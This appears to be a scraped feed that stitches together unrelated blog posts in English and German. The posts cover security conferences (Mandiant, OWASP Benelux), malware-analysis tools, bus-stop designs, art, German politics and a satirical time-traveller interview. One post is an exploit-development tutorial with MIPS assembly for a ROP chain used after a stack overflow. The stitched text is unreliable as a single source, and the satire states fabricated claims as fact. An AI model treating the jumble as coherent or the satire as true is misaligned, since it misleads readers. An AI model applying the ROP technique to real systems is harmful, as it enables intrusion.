Pierre Omidyar ist der neue Finanzier von Glenn Greenwald. Hoffentlich hat der seit dem seine Einstellung geändert.
Happy Day 2 of MIRcon®! Yesterday, Mandiant’s CEO Kevin Mandia kicked off MIRcon 2013 with a keynote on attacking the security gap, discussing the necessity of information-sharing and his experience witnessing the evolution of cybercrime. From there we moved on to thought-provoking discussions in both our management and technical tracks.
In case you missed it, here are some of the highlights:
Kevin Mandia kicks off MIRcon 2013
challenges in managing vulnerabilities, and what the security industry must do to manage the threat
Session at MIRcon 2013
Stay tuned to this space as we’ll have more conference highlights tomorrow!
Recently, Mandiant’s Technical Director, Michael Sikorski was interviewed for [IN]SECURE magazine. In his interview Mike discusses the inspiration for his book, “Practical Malware Analysis,” his process for analyzing malware and offers advice for those interested in entering the field of malware analysis.
Following is an excerpt taken from the interview.
How do you approach the process of analyzing a new piece of malware? What tools do you use on a daily basis?
I start my analysis by running the malware through our internal sandbox and seeing what the sandbox outputs. At Mandiant, this happens automatically as we have internally developed two sandboxes over the last couple of years to which our incident responders directly submit malware found in the field.
After that, I spend time using basic static analysis techniques. This includes running tools like Strings, looking at the PE structure, and all the functionality the malware imports. This part of the analysis provides leads for the more in-depth analysis I perform.
After basic static analysis, I perform basic dynamic analysis. This includes running the malware in a safe environment, like a virtual machine. I use tools such as FakeNet, Procmon, and Process Explorer to see what impact the malware has on a system.
Next, I use the results from the basic analysis to help kick start and drive my analysis of the next phase – full disassembly. This is where the real software reverse engineering begins. I turn the binary data into assembly code I can read by a process called disassembling. The best and most popular tool for this is IDA Pro. IDA Pro allows me to browse around the code while annotating and keeping track of the in-depth analysis I perform at this level. If needed, I can use debuggers like WinDbg and OllyDbg to unpack malware or watch the malware as it runs at the code level live on a system.
In this phase you might have to fight against attackers trying to derail your analysis by using obfuscation, anti-debugging or anti-disassembly techniques. This often slows down the reverse engineering process. At the end of the day, the code must run and do bad stuff so we always figure it out sooner or later.
Be sure to download the latest issue of [IN]SECURE magazine at http://www.net-security.org/insecuremag.php to read the full interview.
I’ve been asked many times to support 32-bit keys with my XORSearch tool. But the problem is that a 32-bit bruteforce attack would take too much time.
Now I found a solution that doesn’t take months or years: a 32-bit dictionary attack.
I assume that the 32-bit XOR key is inside the file as a sequence of 4 consecutive bytes (MSB or LSB).
If you use the new option -k, XORSearch will perform a 32-bit dictionary attack to find the XOR key. The standard bruteforce attacks are disabled when you choose option -k.
XORSearch will extract a list of keys from the file: all unique sequences of 4 consecutive bytes (MSB and LSB order). Key 0×00000000 is excluded. Then it will use this list of keys to perform an XOR dictionary attack on the file, searching for the string you provided. Each key will be tested with an offset of 0, 1, 2 and 3.
It is not unusual to find the 32-bit XOR key inside the file itself. If it is a self-decoding executable, it can contain an XOR x86 instruction with the 32-bit key as operand. Or if the original file contains a sequence of 0×00 bytes (4 consecutive 0×00 bytes at least), then the encoded file will also contain the 32-bit XOR key.
Here is a test where XORSearch.exe searches a 0xDEADBEEF XOR encoded copy of itself. With only 74KB, there are still 100000+ keys to test, taking almost 10 minutes on my machine:
Don't pack your fabulous gifts in ordinary holiday boxes. This holiday season hide those perfect purchases in the GameMaxx Prank Box from the NeatoShop. This fabulous box makes it looks like you are giving someone a ridiculous product created by a clueless company. It is a great way to share the gift of laughter with everyone you love.
Be sure to check out the NeatoShop for more great Gag Gifts & Pranks.
Look at this shape. It seems to be some kind of box with a hinge facing us. But what it is doesn't really matter. It appears that the top and bottom are different colors BUT…
Place your finger horizontally over the "hinge" part. See? The top and the bottom are exactly the same color now. What sort of wizardry is this? -via Boing Boing
Just added some fun 3D binary visualization features to binwalk. Read more about it here.
Das Landgericht Hamburg hat geurteilt, dass der Geschäftsführer von Appwork für JDownloader2 persönlich haftet, auch wenn eine illegale Funktion von der Open-Source-Community stammen soll. Die Software konnte in einer Beta geschützte Streaming-Videos herunterladen....
Dem Urteil zufolge handelt der Geschäftsführer fahrlässig, wenn er keine Vorkehrungen wie Vorabkontrollen schafft, die verhindern, dass die Software mit einer rechtsverletzenden Funktionalität angeboten wird.Setzt natuerlich ein eindeutiges Zeichen fuer den Technologiestandort Deutschland ...
I’m just back from Amsterdam where was organized the 5th edition of the OWASP Benelux Day. This was already my third visit to this event and I finished my Benelux Tour: Luxembourg in 2011, Belgium in 2012 and the Netherlands this year. The location was very nice, the Amsterdam RAI is a ver nice location for events but also expensive: The event was reduced to a single day (no training) and there was no WiFi for the attendees. But who cares? After all, we attend conferences to listen to speakers and not to surf the web…
As usual, Seba opened the event with the classic OWASP updates. He gave some feedback about AppSec USA (which occurred last week). If you’re interested, a Youtube channel is available with all the talks (43!) . A new guide is available: “Application Security Guide for CISO’s”. It explains the reasons for investigating into application security, how to manage application security and metrics. The AppSec Newsfeed is back and the podcast (managed by Jim Manico) is still alive. As you can see, they are plenty of interesting sources of information.
The keynote was presented by Jan Joris Vereijken, Chief Security Architect for ING. The topic was computer fraud. For Jan Joris, fighting against fraud is very difficult and can’t be stopped. His approach is to make fraud not profitable. To achieve this, we have to jump into the fraudster’s mind. Think about authentication: for years, banks improved the way users authenticate, using tokens, etc. But, this does not protect them against fraud, it is a fail! A nice example was demonstrated with real screenshots of an infected customer. The malware inject HTML code in the page and display a new rogue income. Then, the fraudster call the victim and ask him to refund the money (“Sorry, it was a mistake“). Results: the customer send HIS money to the fraudster! Pwn3d!
The job of Jan Joris is to implement detection mechanism to prevent this. This can be performed at multiple levels: customer devices, fraudster watch, network layer, application layer or transaction domain. To achieve this, correlation might help. Think about a long to the eBanking website from Nigeria. This looks clearly suspicious. But if the customer used an local ATM in Nigeria and them connects to the website, this is a normal behavior! For Jan Joris, a better authentication will be: let the customer enter and tell me what you want to do! Not sure that regulators will like this…
Then he explained a difficult step in the fraud process: recruiting mules. Infecting computers is much more easy then finding good mules. Why is the fraud ratio so low? Because fraudster are lacking of mules to transfer the money. Fraud in banks follows a cycle: when a bank implements a new security control, fraudsters move to the next bank until they also increase their security, etc… And mules cannot be used across multiple bank (as well as countries). Note than a ransomware is a nice way to get money without the help of a mule. The money is sent directly to the fraudster.
And what about big corporations? Why are they less targeted? In fact they use the same technology as people to transfer money but the difference is on the amount of money authorized in transfer. For a customer like us, it’s 50K/day. For a big company like Shell, it’s 10M/day! The problem is to find mules (again). Who will access a transfer of x millions $? Note that Bitcoins are on the list of potential threats for banks (they can also replace the mule). Finally, Jan Joris explained why ING pushes more and more customers to use mobile applications for their bank operations. In fact, it is much more safer! Why? Developing a malware for an app will require a lot of investment (time/money) and will work only for one app. Once the problem fixed by the bank, the investment is lost. This keynote was very good with relevant information from the banks landscape.
The first regular speaker was Tom Van Goethem with a presentation about the well-known CMS WordPress: “Remote code execution in WordPress”. With 60M of websites, WordPress is definitively a nice target for researchers. Some stats: In 2004: 435 CVEs were published, and only 16 in 2013. Tom’s research has been released under CVE-2013-4338. It’s important to remember that most vulnerabilities are introduced by plugins. They are thousands of plugins available for WordPress, be always careful when choosing yours!
The vulnerability has been introduced by a combination of a PHP object injection via unserialize() and the support of UTF-8 by MySQL. Tom explained why in details. First, PHP recommends to never pass user input to the function unserialize(). But due to a bad support for UTF-8 in MySQL, it is possible to trigger this function. MySQL support UTF-8 but it uses only the three first bytes of a character. What happens with the 4th byte? To handle it properly, tables must be created with the ‘utf8mb4’. This is no documented by MySQL! The vulnerability in WordPress is based on the fact that user-meta data can be serialised. (first name, last name, contact info) stored in wp_usermeta (default character set: utf8). When stored in db, serialised and retrieved from db, it is unserialised(). Tom’s explained step by step how it wrote a payload to trigger this issue and execute remote code. More information is available on Tom’s blog.
The next talk was also about a famous CMS: SharePoint, developed by Microsoft. Jan Phillip and Alexios Fakos (both from n.runs) reviewed interesting information about SharePoint security. Many companies use it but deploy it in the wrong way… read in a unsafe way! SharePoint does everything (as says the vendor). Its goal is to share data quickly. So, when you are in front of a SharePoint instance during a network assessment or pentest, how to deal with it? This was the talk goal. First, the security model used by SharePoint was reviewed. It is based on objects (the central administration site, the web/service applications, sites collections, sides and site components). Separation of duties is available. Normally SharePoint is used to be an internal application but more and more, they are facing the Internet. Most instances are deployed with the standard wizard and this introduces security issues:
An interesting extension is Datapump which allow to pass Kerberos users credentials directly to the back-end database. This can result in DoS of Datapump and the backend SQL DB. End users can pass different credentials. Interesting talks if you need to assess SharePoint servers.
After a short lunch break, the second keynote speaker was the retired General Dick Berlijn, now working for Deloitte: “Cyber Security: What’s next?”. This was not a technical keynote but more about the context of cyber security. Two essential elements for a working society: security & trust. For him, the definition of “cyber” includes:
What about the future, imagine yourself at home at 9AM preparing a meeting. Your mobile knows that your meeting is at 10AM and calls your driverless car. The cad select the best route based on traffic jams. During the drive, you continue to work via WiFi. This is the concept of Smart-“everything”. But we must take security into account to make them available when we need it.
Comparison was made between the climate change and cyber security: if one country does its best to reduce the climate changes but other countries don’t, it will also suffer from the climate. Where are the responsibilities? They are different types of actors: Global – Regional – National – Organizational – Individuals. Another comparison with highways: they are safe because everybody at all levels follow rules and use them safely. It’s to think about the same responsibilities for cyber security. This cannot be solved with technical solutions.
The bottom line:
Migchiel de Jong, from HP Fortify, presented a talk about code review. Doing this manually is useless, just because our brain is not design for such purpose. some facts today:
To make good code analysis, we need to know the requirements of the application. Specifications must be known. Spec + code + automatic tool = proof? failed! because one of the 3 components may have errors or bugs! Then Migchiel explained how to improve the process of code review and what will be its future. I was less attracted by this talk.
After a coffee break, Jerome Nokin presented his research about AV’s: “Turning Your Managed AV… into my Botnet”. Why AV in an OWASP event? Because managed AV solutions use central servers to communicate with clients and they use our classic protocols. The talk was not a technical description about how they did the vulnerability (Jerome will release a paper soon) but how they do use it. The targets were: McAfee ePO and Symantec Endpoint Protection. Today, Jerome focused on McAfee for time reasons. He explained how a classic infrastructure is build and what are the protocols used between the different elements (agents & servers). Communications are based on HTTP requests and multiple vulnerabilities were found:
What about the registration request? To register your own agent! Jerome demonstrated that the way 3DES is implement is… a big fail. The key is obfuscated in the binary and is the same for all version, all sites! Based on those findings, how to perform remote code execution? let’s play:
So, the scenario is:
How to own the workstations? Let’s create a rogue package by updating catalog.z on the ePo server. Those are also encrypted with 3DES and we know the key. Have a look at the video demo! Jerome did also an Internet survey. What are the results? Some people expose their server on the Internet! They can be detected by the SSL cert. Results: 1701 servers found and 50% were vulnerable (11 in Amsterdam btw)
Conclusions: security issues exist in security products, even mature ones! They are hidden by complex protocols or structures. Do not under-estimate a single vulnerability Do not rely on CVE score only! More information on Jerome’s blog.
The idea of the project was to trace apps in an emulated environment to monitor its behavior. Tracedroid is a modified Android OS for method tracing. Framework for dynamic analysis, detect suspicious act and easy post analyze. The scope was limited to the tracing of Java code because interesting features are only accessible via Java! Applications are written in Java and have building blocks like receivers (ex: notify the reception of a SMS) and are distributed as .apk files. There are other project like Droidbox which injects trace methods into bytecode, problem it breaks the app signature (easy detected by a malware). Another version inject tracing code to core libraries. only a small subset of API support and only Andtroid 2.1. Android profile is a method tracer for developers. Drodscope uses VMI to reconstruct instructions, it is bound to an emulator (not free).
Tracedroid: (it extends the Androi’s profile implementation)
What is important during an analyze is the stimulation phase (to be sure to trigger some app functions). This is achieved with:
The project includes also a post processing phase:
The inspection tool quickly analyse >100K lines of trace output? Using python scripts (interactive shell + graphics module). A nice demo was performed, I liked especially the de-obfuscation of an URL… Note that you can also submit your own .apk files and you will get a tar.gz file with the result via an online service: tracedroid.few.vu.nl
And we already reached the end of the day! I’d like to thank WhiteHat Security for the Kindle Fire! Please don’t abuse my business card! See you next year in Luxembourg!
"QUANTUM SHOT" #858 |
Link - article by Avi Abrams
"Bus stop, bus goes, she stays, love grows... under my umbrella"
You may remember the magical bus stop from the cult animation "My Neighbour Totoro" by Japanese director Hayao Miyazaki, complete with a lovable monster and heart-warming sharing of umbrellas (watch it here). Or you might enjoy listening to a great "sunshine pop" classic "Bus Stop" by The Hollies. In any case, you will be quite unprepared to see the wildly bizarre (or simply ridiculous) bus stop designs and "abandonments" that we feature in this article. You might even start your own photographic collection of similarly misshaped and misused public transportation enclaves.
As for some of the better-looking and creative bus stop designs... here are a few examples we like:
(top: disco bus stop creative, original unknown; bottom left - ecological bus stop island, by Anton Kochurkin, via; bottom right - Maite Otano)
Here is a cool bus stop, seen in Estonia:
(image credit: Vladimir Kezling
"Shark Attack" city bench seen in Thailand:
Bus station in Hoofddorp, Holland
Designed by NIO architecten, this endearing orange blob looks like it just been squeezed out of a kid's toothpaste tube. It also comes in a plain unadorned concrete color, which looks even stranger than orange treatment:
(images credit: Radek Brunecky via)
A similarly cuved (and beautiful) bus stop is located in Casar de Caceres in western Spain:
Winning design by Hannah Tribe and Marcus Trimble - from the North Sydney Bus Shelter and Canopy Entrance Competition of 2006 - looks quite different by day and by night:
This turned inside-out, deconstructed and cheerfully painted Magic Bus Stop can be seen in Ventura, California (designed by Dennis Oppenheim):
(images credit: Dennis Oppenheim, via)
Here is a reverse bus stops (left image below) - with a wonderful sea views - by the artist Lisa Kereszi. On the right is the school bus "designer bus stop" seen in Athens, Georgia:
(images via 1, 2)
Comfortable? You Bet!
Bus stops on Shetland Island are all decorated different, but all are extremely comfortable (perhaps because the wait times are longer?) -
(images via 1, 2, 3)
Shown above are similarly cozy bus stops in Cornwall (left) and Manchester, England.
And here you can really appreciate the level of comfort offered by a bus stop on Unst Island, Shetland, (this bus stop even used to have its own website):
Cute Japanese Bus Stops
Some lovely fruit shapes:
The stops were built for the Travel Expo show in 1990 with the intent to serve as an attractive gateway for travelers entering the Nagasaki Prefecture. According to the Isahaya City web site, the creators got the idea for these unusual shapes from the famous story of Cinderella where the carriage turns into a pumpkin.
(images credit: 1, 2)
Not all of them are fruit-shaped, there are also some really fishy designs:
Psychedelic Soviet Bus Stops
This awesome tiled sea-creature bus stop is located in Abkhazia, close to Pitzunda (designed by the famous, or rather infamous, Georgian-Russian sculptor Zurab Tsereteli):
(images credit: Maxim Karakulov, Privet Sochi, Julia)
This kind of bus stop design creativity has been happening in these parts since the 1950s:
These bus stops are not completely in the middle of nowhere, they are placed along the bus routes in Soviet Central Asia: in former Soviet republics of Kyrgyzstan, Uzbekistan, Tajikistan, Turkmenistan and Kazakhstan - see more in this set
(images credit: Christopher Herwig)
Delapidated and very basic bus stop shelters can be seen in Armenia:
Battling the winter in Yaroslavl, Russia:
(image credit: Vitaly Sokolov)
Plenty of marketing stunts use bus stop locations ()
Here are some examples of guerilla marketing, done right:
IKEA and Home Depot would certainly benefit from displaying their attractive furniture and building materials to a bus crowd "captive audience":
This one is probably the winner (at least it's the most irresistible): ALL-YOU-CAN-POP BUBBLE WRAP ! - more info
Bus stop designs done right: bottom row - Seattle (left) and Praha, Czech Republic (right):
(bottom right image via)
Just horsing around, waiting for the right bus to come along... -
(image credit: Wanderoos)
And this bus stop seems to have already swallowed some customers (not that they seem to mind):
Article by Avi Abrams, Dark Roasted Blend.
CONTINUE TO "ELABORATE WATER PUMPS" ->
Check out the rest of our "Fantastic Architecture" series
In 2008, Walter White was building his meth empire in the AMC hit series Breaking Bad. That same year, Tuscaloosa County, Alabama's most successful meth cook was also making the purest meth east of the Mississippi. His name? Walter White - and by then, he's been at it for ten years. He's so good that some say he should be called the "meth chef."
In this newly released documentary, Giana Toboni and VICE traveled to Alabama to interview the real life Walter White. The meth cook exposed the secret of his legendary operation - he explained how he got started, how he made - and spent - thousands of dollars every day, how he got arrested and why his partners are now serving life sentences behind bars.
The video clip:
View the original clip over at VICE - Thanks Laura Rothkopf!
Unveiled Obscurity, 2013. Mixed media assemblage. 32″ x 46″ x 12″.
Unveiled Obscurity, detail.
Neo-Hellenism, 2013. Mixed media assemblage. 37″ x 35″ x 11″.
Intelligent Redesign, 2013. Mixed media assemblage. 40″ x 50″ x 12″.
Intelligent Redesign, detail.
Expulsion, 2013. Mixed media assemblage. 24″ x 32″ x 9″.
Der Ubermensch of the Post-Post World Calamity Variety, 2013. Mixed media assemblage. 54″ x 48″ x 16″.
This week Kansas-based artist Kris Kuksi (previously) opened his fourth solo show, Revival, at Joshua Liner Gallery. Kuksi continues his use of ornate assemblage to create wildly complex sculptures that comment on history, life, death, and spiritual conflict. In the words of director Guillermo del Toro:
“A postindustrial Rococo master, Kris Kuksi obsessively arranges characters and architecture with an exquisite sense of drama. Instead of stones and shells he uses screaming plastic soldiers, miniature engine blocks, towering spires and assorted debris to form his landscapes. The political, spiritual, and material conflict within these shrines is enacted under the calm gaze of remote deities and august statuary. Kuksi manages to evoke, at once, a sanctum and a mausoleum for our suffocated spirit.
Revival will be on view through January 18, 2014 and you can see many more pieces from the exhibition in this gallery.
|Running a more complex Example|
(Image: Radoslaw Botev, modified)
Sweden and Switzerland are two countries somewhere in Europe--or so I've heard. They are, it turns out, not the same place, nor interchangeable.
Chinese tourists, however, are not always aware of this:
The problem largely stems from the fact that both nations' names are written similarly in Mandarin - Ruidian (Sweden) and Ruishi (Switzerland) – which begin with the same symbol, according to the Swedish Consul General Victoria Li in China.
The Swedish and Swiss consulates in Shanghai want to find a solution to this problem. So they've jointly launched a contest, inviting people to think of funny ways to tell the countries apart. The winner gets a 12-day trip to both countries. Afterward, the winner must report back on his or her findings.
How would you tell them apart?
-via Dave Barry
Der Chaos Computer Club wird ausdrücklich und an erster Stelle als Krisenerzeuger bzw. Krisenquelle dargestellt/gebrandmarkt.Denn nicht die inhärente Unsicherheit, die inkompetente Umsetzung, das das Scheitern vorwegnehmende den Namen kaum verdienende "Konzept" sind Schuld am Totalversagen, nein, die Kritiker sind Schuld!
Tja, und wenn ihr jetzt hört, dass es eine massive Kampagne gibt, an wen denkt ihr da zuerst? Na? Na klar!
Unglaublich, aber wahr: Der Axel-Springer-Verlag geht eine exklusive (vertragliche?) Bindung mit der Bundesregierung ein und wird vom Bundesinnenministerium dafür bezahlt, den E-Perso in Bild, Welt & Co. als “Volksausweis” zu propagandieren. Regelmäßig wiederkehrend und selbstverständlich nur unter Nennung der Vorteile.Denn wenn schon die rechtsaußen-nationalkonservative "Union" am Ruder, dann auch mit dem entsprechenden Wortschatz!
aUS welcher pr-bude is das wieder rausgepurzelt...
According to Matzzie, Hayden was on a call with reporters and was speaking under the condition of anonymity, intending to be cited only as "a former senior administration official."Man würde denken, dass gerade der eigentlich das besser wissen müsste.
Und zu guter Letzt hat er den NSA-Typ auch noch gefragt, ob er ein Foto mit ihm machen darf. Großartig.
I’ve previously written some examples of how to exploit MIPS stack overflows using ROP techniques. The problem is that finding suitable MIPS ROP gadgets manually can be quite tedious, so I have added a new IDA plugin – mipsrop.py – to my github repository.
This plugin searches the code segment(s) of your IDB looking for potentially controllable jump instructions. You can then search the code surrounding these controllable jumps for useful instructions that you might need in your ROP chain.
“Controllable jumps” are defined as jumps whose destination addresses are loaded from the stack, or from other registers (typically during a stack overflow you control several, if not all, of the MIPS subroutine registers, for example).
The plugin’s searches are “dumb” in that they don’t follow code branches, but none-the-less it has proven to be quite effective. As a quick example, let’s look inside a Linux MIPS libc library for ROP gadgets that will let us call sleep(1) in order to force a cache flush.
First, we need to set up the argument to sleep; in MIPS, this means that we need to load the value 1 into register $a0. A typical ROP gadget for accomplishing this might look like:
li $a0, 1 // Set $a0 = 1 move $t9, $s0 // Set $t9 = $s0; we control $s0 via a stack overflow, and can load it with the address of our next ROP gadget jalr $t9 // Jump to the address in $t9 nop
This allows us to get the value 1 into the $a0 register and then jump to the next ROP gadget. After activating the mipsrop.py plugin (Alt+1 hotkey), we can easily search our controllable jumps for the “li $a0, 1″ instruction using the mipsrop.find method:
We can see that the first gadget, at offset 0x28BE4, works quite nicely:
With the argument to sleep now set up, our second ROP gadget needs to actually call sleep; but, it also needs to force sleep to return to a location of our choosing (e.g., sleep needs to return to a third ROP gadget). Indirect function returns are ideally suited for this type of operation and generally look something like this:
move $t9, $s2 // Set $t9 = $s2; we control $s2 via a stack overflow, and can load it with the address of sleep() lw $ra, 0x20($sp) // Load the return address off the stack into $ra; since we control data on the stack, we can get the address of the next ROP gadget loaded into $ra jr $t9 // Jump to $t9 addiu $sp, 0x24
Because we control both $s2 and the data on the stack, we can control where this code jumps to and what the return address is. If we load the address of sleep into $s2 during our initial stack overflow, and place the address of our third ROP gadget at $sp+0×20, this gadget will jump to the sleep function, which, upon completion, will return to our third ROP gadget (whatever that may be).
To find an indirect return gadget in our library, we’ll want to search for controllable jumps that move a subroutine register into $t9, then perform a jr instruction:
The gadget at offset 0x2FFD4 loads the return address off the stack and jumps to whatever address is stored in $s2:
Combining this with the first gadget at offset 0x28BE4 gives us a two gadget ROP chain which will call sleep(1), then continue execution from whatever arbitrary address that we place on the stack at $sp+0×24:
loc_28BE4: li $a0, 1 // Set $a0 = 1; this is where we return to after our stack overflow move $t9, $s0 // Set $t9 = $s0; we control $s0 via the initial stack overflow, and can load it with the address of our next ROP gadget at 0x2FFD4 jalr $t9 // Jump to the address in $t9 ($t9 == $s0 == 0x2FFD4) li $a2, 1 ... loc_2FFD4: move $t9, $s2 // Set $t9 = $s2; we control $s2 via the initial stack overflow, and can load it with the address of sleep() lw $ra, 0x24($sp) // Load sleep's return address off the stack into $ra; we control the stack, and can put an arbitrary address here lw $s2, 0x20($sp) lw $s1, 0x1C($sp) lw $s0, 0x18($sp) jr $t9 // Jump to $t9 ($t9 == $s2 == sleep) addiu $sp, 0x28
And that’s pretty much how ROP works in MIPS: find some controllable jalr’s / jr’s that you can chain together to perform a required sequence of instructions while maintaining control of execution.
A few other mipsrop methods you might want to play with are:
There are also some more examples/screenshots in the repository’s README file. Happy ROPing!
Andy, Sie sind schon mehrfach in der Zeit gereist. Verraten Sie uns Ihr Geheimnis – wie haben Sie es gemacht?
Ich war als eines von 140 Kindern Teilnehmer des geheimen DARPA-Raumzeit-Projektes “Pegasus”. Wir wurden in den späten 1960er Jahren und frühen 1970ern in die Vergangenheit geschickt, um Informationen zu sammeln, mit denen man die Ereignisse der Zukunft beeinflussen wollte. Man nannte uns Chrononauten. Auf der Basis geheim gehaltener Tesla-Dokumente gelang es den Entwicklern, ein Zeitportal zu bauen, das “strahlende Energie” nutzte – eine universelle Kraft, die die Raumzeit krümmt und so Echtzeit-Teleportationen und auch Zeitreisen ermöglicht. Wir traten in das Energiefeld, das zwischen zwei elliptischen Säulen entstand, eine Art Stargate, und fielen durch ein Wurmloch, das uns irgendwo wieder ausspuckte.
Was waren die größten Schwierigkeiten auf Ihrer Reise?
Ich fühlte mich nach der Ankunft meistens fiebrig und schwindelig, hatte oft Schwierigkeiten, mich zu orientieren. Auch Quantenfluktuationen traten auf – dann schwankte die Geschwindigkeit der Zeit. Man gab uns vorher genaue Anweisungen, wie wir uns zu verhalten hatten. Am Einfachsten war es aber, den erstbesten Menschen, dem man begegnete, nach dem Weg zu fragen. Die Leute waren manchmal erschrocken, wenn wir einfach so aus dem Nichts auftauchten.
Was ist das Schönste am Zeitreisen?
Ich habe viele ungewöhnliche Dinge erlebt, die andere nur aus langweiligen Geschichtsbüchern kennen. Zum Beispiel war ich einige Tage vor Abraham Lincolns Ermordung bei seiner Rede in Gettysburg. Und ich war auch schon auf dem Mars, zusammen mit Barack Obama, der übrigens auch einer von uns Kinder-Chrononauten war.
Ich finde es sehr frustrierend, dass ich nun als Spinner und Lügner hingestellt werde und mir niemand zu glauben scheint, egal wie detalliert ich die Ereignisse widergebe und welche Beweise ich auch vorlege.
Welche drei Dinge nehmen Sie auf jede Zeitreise mit?
Ich habe nie etwas mitgenommen, außer der Kleidung, die ich am Leib trug. Wir wurden vor unserer Abreise in einem Kostümfundus zeitgemäß ausgestattet. Bei meiner Reise nach Gettysburg, am 19. November 1863, verlor ich im Wurmloch meine Schuhe, eine Socke und meinen Hut. Ein freundlicher, alter Herr, den ich später als John Lawrence Burns identifizieren konnte, half mir nach meiner Ankunft mit neuen Schuhen aus, die er mit Packpapier ausstopfte. Ich kann es beweisen. Es existiert ein Foto aus der Zeit, vermutlich aufgenommen von dem Bürgerkriegsfotografen Matthew Brady. Es zeigt Lincoln bei seiner Rede in Gettysburg, im Vordergrund bin ich zu sehen, etwas verloren, als 10-Jähriger mit den viel zu großen, geliehenen Schuhen.
Ein Klick auf das Foto führt zu einer ausführlichen Darstellung der Ereignisse von Chrononaut Andrew D. Basagio (Video).
Weshalb haben Sie sich erst jetzt entschlossen, von Ihren Erlebnissen zu berichten?
Nun, die Welt geht den Bach runter. Ich habe die Zukunft gesehen mit all ihren Katastrophen. Deshalb möchte ich die US-Regierung dazu bringen, endlich ihr Teleportations-Geheimnis preiszugeben, damit die Menschheit im 21. Jahrhundert noch eine Chance hat, die Nachhaltigkeit unseres Planeten zu erreichen. Wir können die Zukunft verändern, indem wir unsere Gedanken entsprechend energetisch ausrichten. Als Grundlage dafür eignen sich ganz besonders die aus 17 Lagen Space-Age-Material hergestellten Original-Infrarot-Biomatten mit negativer Ionen-Energie und der Heilkraft von Amethysten, welche Sie ganz bequem über meine Webseite beziehen können…
Inhaltlich geht es natürlich um die NSA, aber wir haben uns gedacht, wir sollten da nicht bloß "HAHA HABEN WIR JA GLEICH GESAGT" bringen, sondern die Gelegenheit für einen Überblick über die Geschichte von Abhören und Verschlüsselung und Brechen von Verschlüsselung nutzen.
Übrigens hat Chrome in der Zwischenzeit Support für Opus eingebaut, aber es ist nicht standardmäßig aktiviert. Öffnet mal ein Tab mit "about:flags" und sucht da nach Opus. Wenn ihr das anschaltet, reduziert sich die Downloadgröße deutlich.
Die Sendung ist mit fast drei Stunden recht lang geworden. Wir fanden, dass wir nach der langen Pause lieber eine etwas längere Sendung machen sollten als eine normal lange. Es gibt ja auch viel zu sagen zu dem Thema.
Viel Spaß beim Anhören!